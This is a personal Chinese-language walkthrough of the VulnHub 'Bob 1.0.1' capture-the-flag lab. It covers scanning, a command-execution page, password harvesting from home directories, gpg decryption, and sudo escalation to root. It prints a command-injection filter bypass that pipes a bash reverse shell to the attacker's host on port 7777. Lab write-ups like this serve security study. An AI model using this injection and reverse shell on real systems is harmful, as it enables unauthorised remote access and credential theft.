#免责声明:
本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
Bob_v1.0.1靶机
主机发现与端口扫描
靶机下载地址 Bob: 1.0.1 ~ VulnHub
下载之后,本地解压,用VMware运行该虚拟机。
设置靶机 Bob_v1.0.1 与攻击机网络环境,保证在同一局域网,方便都设置成net模式。
靶机MAC地址
扫描存活的主机 netdiscover -r 192.168.61.0/24
核对MAC地址,发现相应靶机MAC地址的IP为 192.168.61.148
扫描端口,nmap -A -T4 -p- 192.168.61.148
发现开放了21、80、25468端口,发现ssh服务端口号改为了25468
目录扫描 dirsearch http://192.168.61.148/
web渗透
访问 192.168.61.148
默认网站是个highschool高中学校网站
发现Login登录界面,结果被禁止外部登录
访问刚刚目录扫描出的/passwords.html
是Bob留下的一段话,翻译如下
真的是谁制作了这个文件,至少得到了你的密码哈希来显示, 黑客不能用哈希做任何事情,这可能就是我们有安全性的原因 首先是违规行为。科蒙 人们这是基本的101安全!我已将文件移出服务器。不要让我每次都收拾烂摊子 有人做了这样愚蠢的事情。我们将就这个和其他问题举行会议 我在服务器上找到的东西。>:(
-鲍勃
众所周知哈,robots.txt 里大概率有有用的信息,访问一哈瞅瞅
挨个访问一哈,发现dev_shell.php有用,应该是个执行命令的站
试试执行ls -al ,可能被禁止执行了
执行id
尝试命令 id | ls 发现dev_shell.php.bak 下载到本地查看一下
发现一些被禁止执行的命令,但是nc
试试执行反弹shell代码
pwd&echo "bash -i >& /dev/tcp/192.168.61.131/7777 0>&1" | bash
反弹成功
提权
cd到home目录,发现有四个用户
到bob用户看看,发现有个可能存放password的文件 .old_passwordfile.html
cat查看该文件内容,发现jc和seb用户的密码
到 elliot 用户家目录下看看有没有有用信息,发现theadminisdumb.txt文件,里面内容应该是 elliot 写给员工的信
观察内容发现这里也提到 jc 密码为Qwerty,并且他将自己密码改为了theadminisdumb,并且两次提到了愚蠢的 bob,哈哈哈哈,那我们再仔细看看小鲍勃那有什么好东西
在 /bob/Documents 目录下发现了加密文件login.txt.gpg和Secret的秘密目录,说不定Secret存放着小秘密,一路挖掘最后发现了notes.sh文件,cat看看
看了不如不看,本人不适合猜谜,查看其他友人的复现资料,发现此处是个藏头诗,密钥为 HARPOCRATES
再回到Documents文件查看staff.txt内容
感觉没啥用
我们去用密钥解密那个gpg文件
gpg -d login.txt.gpg
哦吼权限不够,那就用刚刚找到的密码ssh远程登录jc用户,再解密试试
ssh jc@192.168.61.148 -p 25468
输入密钥,解密成功,拿到bob的密码 b0bcat_
切换到bob用户
ssh bob@192.168.61.148 -p 25468
成功登录
sudo -l 查看有没有可利用的提权,果然bob是个愚蠢的人,既然ALL(具有所有命令)的话,直接su root
提权成功!
在根目录找到 flag
完结!
靶场相关文章:Hack the Bob: 1.0.1 VM (CTF Challenge) - Hacking Articles